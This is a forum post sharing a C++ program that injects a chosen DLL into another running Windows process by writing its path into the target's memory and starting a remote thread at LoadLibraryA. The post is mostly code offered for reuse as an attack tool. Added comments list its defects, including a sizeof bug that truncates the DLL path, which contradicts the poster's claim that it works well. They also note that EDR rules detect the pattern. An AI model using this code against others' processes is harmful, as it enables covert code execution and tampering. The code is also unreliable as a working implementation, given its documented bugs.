Old 10-11-2015, 19:40
CryptXor CryptXor is offline
[C++] DllInjection

All credits for this go to the Information Systems and Internet Security (ISIS) Laboratory. I am just sharing this since it is something that I have used often and it works damn well! Hope someone else finds it just as useful.

Code:
#include 
#include "windows.h"
#include "stdlib.h"

using namespace std;

// Loads the DLL named on the command line into a running process by
// creating a thread in that process whose start routine is LoadLibraryA.
//
// Usage:  <program> <pid> [dll-path]
//   argv[1]  decimal process id of the target, parsed with atoi
//   argv[2]  optional full path of the DLL; when omitted, the literal
//            assigned to `attackdll` below is used
//
// Exit status: -1 on any failed Win32 call up to WriteProcessMemory.
// There is no `return` after CreateRemoteThread, so main falls off the
// end and yields 0 whether or not the remote thread was created.
//
// Review notes (defects visible in this listing, left as-is here):
//  - `sizeof(attackdll +1)` is sizeof(char*), not the path length, so
//    only a pointer-sized prefix of the path is written to the target.
//  - Neither the process handle nor the thread handle is closed with
//    CloseHandle, and the region allocated in the target is never freed.
//  - atoi reports no parse error; a non-numeric argv[1] becomes pid 0.
//  - The DLL path is written into a fixed 256-byte region without any
//    length check.
//  - The OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx ->
//    WriteProcessMemory -> CreateRemoteThread(LoadLibraryA) sequence is
//    the classic remote-thread injection pattern that endpoint telemetry
//    and EDR detection rules commonly key on.
int main(int argc, char *argv[])
{
	HANDLE prochandle;	//handle to the target process, returned by OpenProcess (never closed below)
	HANDLE threadhandle;	//handle to the thread created in the target; never checked, waited on or closed
	HMODULE dllhandle;	//module handle of Kernel32.dll as loaded in THIS process
	int procid;	//target process id from argv[1]; OpenProcess takes a DWORD, so this converts implicitly
	FARPROC loadlibraryaddr;	//address of LoadLibraryA as resolved in THIS process
	void* baseaddr;		// address of the buffer allocated inside the target for the DLL path
	char* attackdll;	//full path of the DLL to load; binding a string literal to non-const char* is ill-formed since C++11

	
	/*
		Parse the arguments: exactly one (pid) or two (pid, dll path) are accepted
	*/
	if(argc < 2 || argc > 3)
	{
		cout << "Error, incorrect amount of args" << endl;
		return -1;
	}

	if(argc == 2)
	{
		procid = atoi(argv[1]);	//atoi gives no error indication; non-numeric input yields 0
		attackdll = "C:\\windows\\testdll.dll";	//hard-coded default path, not checked for existence
	}

	else
	{
		procid = atoi(argv[1]);	//atoi gives no error indication; non-numeric input yields 0
		attackdll = argv[2];	//caller-supplied path, used unchecked
	}

	/*
		Injection sequence (step numbers match the comments below):
		1) open the target process
		2) resolve LoadLibraryA via Kernel32.dll in this process
		3) allocate a buffer in the target for the DLL path
		4) write the path into that buffer
		5) start a thread in the target at LoadLibraryA with the buffer as its argument
	*/

	// 1. Open the target process. PROCESS_ALL_ACCESS is far more than the
	// later calls need (allocate/write/create-thread rights) and is the
	// access mask most often surfaced in process-access telemetry.
	prochandle = OpenProcess
				(
					PROCESS_ALL_ACCESS,		//desired access
					FALSE,					//inherit handle, is this handle inheritable
					procid					//procid of the process
				);

	if(prochandle == NULL)
	{
		cout << "Error, could not get a handle to the process" << endl;
		return -1;
	}

	cout << "Process Handle acquired" << endl;

	//2. Get the address to LoadLibraryA

	//2a. Get a handle to Kernel32.dll in this process, since LoadLibraryA is exported from it
	dllhandle = GetModuleHandle("Kernel32.dll");
	if(dllhandle == NULL)
	{
		cout << "Error, could not get a handle to Kernel32.dll" << endl;
		return -1;
	}

	cout << "Kernel32.dll handle acquired" << endl;


	//2b. Resolve LoadLibraryA in this process. The same address is reused
	//as the thread start routine in the target (step 5), which presumably
	//relies on Kernel32 being mapped at the same base in both processes.
	loadlibraryaddr = GetProcAddress
						(
							dllhandle,	//hmodule
							"LoadLibraryA"	//exported function name
						);

	if(loadlibraryaddr == NULL)
	{
		cout << "Error, unable to obtain the address to LoadLibraryA" << endl;
		return -1;
	}

	cout << "Acquired the address to LoadLibraryA" << endl;

	//3. Allocate the buffer in the target that will hold the DLL path
	// (the argument handed to the remote thread). It is never released.

	baseaddr = VirtualAllocEx
				(
					prochandle,	//handle to the target process; the region is allocated in its address space
					NULL,	//address
					256,	//size of allocated memory; fixed, the path length is never checked against it
					MEM_COMMIT | MEM_RESERVE,	// allocation type
					PAGE_READWRITE		// protections
				);

	if(baseaddr == NULL)
	{
		cout << "Error, unable to allocate memory" << endl;
		return -1;
	}

	//4. Write the DLL path into the buffer allocated in step 3

	if( WriteProcessMemory
			(
				prochandle,	//handle to the process containing our allocated memory
				baseaddr,	//the address of the memory location
				attackdll, //the path bytes to copy
				sizeof(attackdll +1), //BUG: sizeof of a pointer expression is sizeof(char*), not the string length; the path is truncated
				NULL	//number of bytes written
			) == NULL)
	
	// failure branch: WriteProcessMemory returns BOOL, so this compares the result with 0
	{
		cout << "Error, could not write the arguments into memory" << endl;
		return -1;
	}


	//5. Start a thread in the target at LoadLibraryA with the buffer from
	// step 3 as its single argument. The result is not checked for NULL,
	// the thread is not waited on, and the handle is never closed.
	threadhandle = CreateRemoteThread
					(
						prochandle,		//the handle to our remote process
						NULL,			//thread attributes
						0,				//stack size
						(LPTHREAD_START_ROUTINE)loadlibraryaddr,	//start address (C-style cast of the FARPROC)
						baseaddr,		//thread argument: the buffer holding the DLL path
						0,			//creation flags
						NULL		//thread id
						);
	// No return statement: main implicitly returns 0 here regardless of
	// whether CreateRemoteThread succeeded.
}